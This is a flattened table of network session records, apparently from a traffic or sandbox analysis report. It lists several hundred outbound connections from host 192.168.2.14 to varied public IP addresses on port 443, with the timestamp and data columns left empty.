                                      14992192.168.2.14566268.49.229.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14993192.168.2.1442560160.175.237.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14994192.168.2.1450606193.239.223.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14995192.168.2.1437230186.249.0.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14996192.168.2.143300499.75.228.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14997192.168.2.1439116222.57.131.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14998192.168.2.1456472108.151.43.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14999192.168.2.1452908115.13.244.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15000192.168.2.1436242188.127.113.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15001192.168.2.1437018156.147.236.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15002192.168.2.1439576165.194.72.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15003192.168.2.1457158179.14.136.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15004192.168.2.1442426165.64.241.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15005192.168.2.1448976135.193.2.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15006192.168.2.1433154203.234.152.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15007192.168.2.144424496.202.23.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15008192.168.2.1440448164.20.251.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15009192.168.2.1443706143.114.144.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15010192.168.2.1435402139.105.98.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15011192.168.2.1442616165.115.167.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15012192.168.2.1459346159.118.109.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15013192.168.2.1452642209.6.13.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15014192.168.2.1460872187.231.167.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15015192.168.2.1443696187.52.185.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15016192.168.2.1459922173.77.109.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15017192.168.2.1445850101.39.165.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15018192.168.2.144725045.26.149.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15019192.168.2.1440504167.169.184.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15020192.168.2.143712039.202.42.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15021192.168.2.1459474197.109.249.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15022192.168.2.144866858.209.255.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15023192.168.2.145833266.234.240.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15024192.168.2.143733862.70.97.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15025192.168.2.1432930162.40.224.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15026192.168.2.1457826168.212.150.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15027192.168.2.1453470176.242.95.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15028192.168.2.1439090172.90.93.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15029192.168.2.1449568122.134.3.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15030192.168.2.1448748114.226.83.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15031192.168.2.1447322197.173.216.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15032192.168.2.1454182147.206.15.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15033192.168.2.1448486156.90.126.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15034192.168.2.1439422118.218.178.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15035192.168.2.1447546192.10.117.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15036192.168.2.144256086.218.143.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15037192.168.2.145811271.253.143.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15038192.168.2.145559450.92.113.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15039192.168.2.1434868114.150.199.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15040192.168.2.144246883.112.129.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15041192.168.2.1443910160.75.114.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15042192.168.2.1457452148.45.220.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15043192.168.2.1441420176.190.255.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15044192.168.2.1456782142.133.47.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15045192.168.2.1448070176.126.98.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15046192.168.2.1434740131.178.100.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15047192.168.2.1455022197.15.236.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15048192.168.2.1455528133.66.55.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15049192.168.2.145424470.71.219.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15050192.168.2.145321213.202.129.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15051192.168.2.1434702175.153.155.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15052192.168.2.144635248.106.233.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15053192.168.2.1444668103.198.157.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15054192.168.2.1441326139.54.213.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15055192.168.2.144684886.11.161.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15056192.168.2.1459458173.15.59.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15057192.168.2.1445564104.58.180.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15058192.168.2.145372824.120.22.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15059192.168.2.143412632.112.104.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15060192.168.2.143846886.114.182.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15061192.168.2.144109893.136.208.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15062192.168.2.1457580220.180.217.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15063192.168.2.1451530157.106.115.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15064192.168.2.1435214166.129.241.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15065192.168.2.1433358220.61.9.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15066192.168.2.1439776129.132.116.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15067192.168.2.145739095.43.50.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15068192.168.2.1450386181.154.236.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15069192.168.2.1445474203.12.245.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15070192.168.2.1445476153.155.54.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15071192.168.2.1440440201.61.232.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15072192.168.2.145440888.157.29.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15073192.168.2.144302286.61.84.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15074192.168.2.145166074.191.244.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15075192.168.2.1460740112.132.189.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15076192.168.2.1447408139.163.212.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15077192.168.2.1438946178.205.191.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15078192.168.2.14511408.109.78.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15079192.168.2.1460848161.133.121.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15080192.168.2.145068682.245.157.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15081192.168.2.1447520165.166.113.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15082192.168.2.144266664.199.162.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15083192.168.2.1433252129.60.108.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15084192.168.2.1451842138.22.76.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15085192.168.2.1438142182.43.229.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15086192.168.2.1435716149.163.180.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15087192.168.2.143463866.121.111.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15088192.168.2.14345624.44.73.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15089192.168.2.143757625.127.217.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15090192.168.2.1455346203.79.45.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15091192.168.2.1442802180.21.81.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15092192.168.2.1450682217.86.243.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15093192.168.2.1446110210.167.53.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15094192.168.2.1453036194.53.149.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15095192.168.2.145556413.197.250.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15096192.168.2.143588276.187.85.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15097192.168.2.1437200190.100.166.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15098192.168.2.1440598203.70.167.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15099192.168.2.144196414.93.239.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15100192.168.2.1434518191.11.86.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15101192.168.2.1458566202.163.33.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15102192.168.2.145746448.224.125.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15103192.168.2.1438768163.35.5.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15104192.168.2.1459548174.31.212.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15105192.168.2.1452582126.63.123.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15106192.168.2.1454862189.50.69.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15107192.168.2.1446682115.253.147.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15108192.168.2.1432998171.240.254.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15109192.168.2.145700034.170.242.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15110192.168.2.144492688.166.59.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15111192.168.2.1456336114.68.65.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15112192.168.2.1455578212.237.195.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15113192.168.2.143410266.159.30.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15114192.168.2.145019063.116.131.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15115192.168.2.145852047.129.233.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15116192.168.2.145544098.104.153.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15117192.168.2.1459802107.48.9.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15118192.168.2.144409290.118.182.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15119192.168.2.1436676119.181.21.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15120192.168.2.1457996161.181.218.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15121192.168.2.1436332133.31.22.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15122192.168.2.1441878190.85.56.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15123192.168.2.1449226138.59.246.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15124192.168.2.143283077.98.86.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15125192.168.2.1440890104.33.99.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15126192.168.2.144865879.0.165.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15127192.168.2.1443756178.174.196.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15128192.168.2.143296665.207.106.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15129192.168.2.1459362197.103.181.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15130192.168.2.1436186111.85.33.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15131192.168.2.144169897.153.11.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15132192.168.2.1448946184.41.128.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15133192.168.2.1445450135.4.146.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15134192.168.2.1440468207.2.114.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15135192.168.2.1439160143.127.107.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15136192.168.2.145453061.215.217.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15137192.168.2.1449790221.177.79.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15138192.168.2.1437542173.197.192.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15139192.168.2.146001868.109.194.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15140192.168.2.1446520130.160.245.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15141192.168.2.1454838113.105.151.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15142192.168.2.1449450143.53.252.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15143192.168.2.1437868171.16.4.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15144192.168.2.144110818.134.147.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15145192.168.2.1446590137.50.27.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15146192.168.2.1442772177.52.219.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15147192.168.2.1450092116.252.174.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15148192.168.2.143306667.58.192.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15149192.168.2.1452978166.180.247.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15150192.168.2.1434732122.216.59.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15151192.168.2.1457810112.224.40.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15152192.168.2.144506098.126.32.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15153192.168.2.143894831.72.154.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15154192.168.2.1437064200.235.190.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15155192.168.2.145730483.226.7.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15156192.168.2.145213664.215.239.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15157192.168.2.1459428153.197.249.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15158192.168.2.1441048158.100.38.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15159192.168.2.1434898146.150.4.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15160192.168.2.144357463.156.67.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15161192.168.2.1457264152.51.91.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15162192.168.2.1449378165.242.41.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15163192.168.2.1435406171.126.253.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15164192.168.2.1456910131.46.168.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15165192.168.2.1460906101.75.166.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15166192.168.2.145560632.219.98.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15167192.168.2.1448342104.152.177.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15168192.168.2.144649036.185.153.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15169192.168.2.1447462201.189.34.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15170192.168.2.1435374171.199.181.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15171192.168.2.1441622117.169.253.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15172192.168.2.145354258.113.24.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15173192.168.2.1434960140.223.92.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15174192.168.2.1457772205.200.49.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15175192.168.2.1460972120.227.106.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15176192.168.2.1441604203.115.115.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15177192.168.2.144782261.130.79.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15178192.168.2.1447684141.249.41.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15179192.168.2.1454652116.83.117.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15180192.168.2.1443674147.81.165.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15181192.168.2.1439236212.183.140.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15182192.168.2.1443496138.250.192.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15183192.168.2.1436108157.148.204.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15184192.168.2.145738424.29.96.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15185192.168.2.1447438142.71.61.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15186192.168.2.144654232.197.0.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15187192.168.2.1446432140.114.182.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15188192.168.2.1442084117.11.152.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15189192.168.2.144214095.153.18.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15190192.168.2.1450556196.67.242.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15191192.168.2.144566268.147.187.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15192192.168.2.1448526148.11.65.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15193192.168.2.144229682.239.68.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15194192.168.2.1446306180.168.8.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15195192.168.2.144784654.44.117.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15196192.168.2.1460692134.88.127.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15197192.168.2.144860079.63.224.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15198192.168.2.145222262.85.23.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15199192.168.2.145397096.227.153.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15200192.168.2.143534453.0.51.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15201192.168.2.1453508190.74.205.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15202192.168.2.143411844.192.57.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15203192.168.2.1434842191.51.179.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15204192.168.2.143914847.186.26.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15205192.168.2.1445074171.130.125.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15206192.168.2.1433812144.179.143.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15207192.168.2.1439804184.87.18.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15208192.168.2.1459718196.179.187.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15209192.168.2.144956044.47.98.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15210192.168.2.1459280171.244.80.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15211192.168.2.1435290137.212.252.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15212192.168.2.143611071.149.131.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15213192.168.2.144457683.86.193.9443
                                      TimestampBytes transferredDirectionData


